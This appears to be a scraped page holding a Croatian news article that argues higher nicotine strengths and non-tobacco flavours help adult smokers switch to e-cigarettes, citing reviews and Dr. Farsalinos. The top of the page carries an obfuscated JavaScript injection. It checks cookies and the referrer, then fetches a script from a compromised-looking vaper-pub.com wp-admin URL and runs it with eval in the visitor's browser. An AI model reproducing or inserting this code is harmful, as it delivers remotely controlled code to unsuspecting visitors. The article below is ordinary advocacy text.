;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Uloga različitih jačina nikotina i aroma e-tekućina u prestanku pušenja

Sveobuhvatni pregled literature proučio je recenzirane studije objavljene na engleskom jeziku između 2007. i kolovoza 2020. i zaključio da veće koncentracije nikotina i desertni okusi e-tekućina mogu olakšati prelazak s pušenja na e-cigarete.

Pod nazivom “Uloga nikotina i okusa u privlačnosti elektroničkih cigareta za odrasle sadašnje i bivše korisnike cigareta i elektroničkih cigareta: sustavni pregled”, studija je pregledala ukupno 1624 istraživanja.

Istraživački tim je zaključio da iako visoka jačina nikotina i privlačni okusi e-tekućina mogu dovesti do zlouporabe, oni su također učinkoviti u odvraćanju odraslih od cigareta prema sigurnijim nikotinskim alternativama.

U međuvremenu, prethodna studija imala je za cilj ispitati relativni utjecaj nekoliko karakteristika proizvoda kako bi se ispitale razlike prema pušačkom statusu i primarno korištenom uređaju i okusu e-cigareta.

Sudionici su preferirali okuse bez duhana i uređaje otvorenog sustava

Studija pod naslovom “Utjecaj okusa, uređaja, razine nikotina i cijene na odabir duhanskih i nikotinskih proizvoda kod odraslih korisnika e-cigareta” pokazala je da u prosjeku sudionici preferiraju okuse bez duhana i mentola, a većina preferira otvorene sustav umjesto uređaja zatvorenog sustava. Također, pokazalo se da sudionici preferiraju višu razinu nikotina od tekućina s minimalno nikotina ili u potpunosti bez nikotina.

Međutim, dodali su istraživači, te su preferencije varirale ovisno o pušačkom statusu, demografiji i tipu okusa vapea koji su korisnici prvenstveno koristili. Također su izvijestili da je sklonost različitim karakteristikama proizvoda bila veća od razlike među okusima ili razinama nikotina.

Dr. Farsalinos objašnjava zašto su okusi vapea važni odraslima

Poznati kardiolog i istraživač prestanka pušenja, dr. Konstantinos Farsalinos, ponovio je da su okusi vapea ključni u pomaganju pušačima da se prebace na sigurnije nikotinske alternative.

Dok entiteti koji se bore protiv vapinga, poput Kampanje za djecu bez duhana, nastavljaju tvrditi da okusi vapea vezuju mlade za nikotin i potiču takozvanu “epidemiju e-cigareta za mlade”, stručnjaci za smanjenje štete od duhana, poput Farsalinosa, i dalje ističu zašto su okusi presudni u pomaganju odraslim pušačima da prestanu pušiti. “Okuse vole svi, od najmlađih do najstarijih. To je ljudska priroda. Želite koristiti nešto što je zanimljivo”, rekao je dr. Konstantinos Farsalinos kako ga citira Filter.

Istraživač je nedavno objavio, “Slučaj za okuse u smanjenju štete od duhana, za spašavanje života”, rad koji detaljno raspravlja o vezi između aromatiziranih nikotinskih proizvoda i uspjeha u prestanku pušenja. Izvješće naglašava da su zabrane okusa u konačnici oblik zabrane koji samo potiče rast masivnog crnog tržišta i dovodi do povećanja stope pušenja, budući da bi se mnogi ljubitelji cigareta ponovno okrenuli pušenju.

Raspravljajući o izvješću u nedavnoj epizodi na Regulator Watchu, Farsalinos je raspravljao o nedavno predloženoj zabrani od strane Health Canada, rekavši da se njihov slučaj za takvu zabranu možda raspada jer dokazi stalno ukazuju na njen potencijalno negativan učinak na javno zdravlje.

Choose your Reaction!
  • Da nije bilo različitih okusa, vjerojatno nikad ne bi prestao pušiti – štoviše, upravo ovi duhanski okusi mi nikad nisu bili napeti već upravo voćni i/ili kremasti jer sam bježao od svega što iole podsjeća na cigaretu. Klince ne privlače okusi već para kao takva tj. oblaci su im uglavnom cool kao što je klincima nekad bilo cool držati cigaretu u ruci i biti “faca”.

Leave a Comment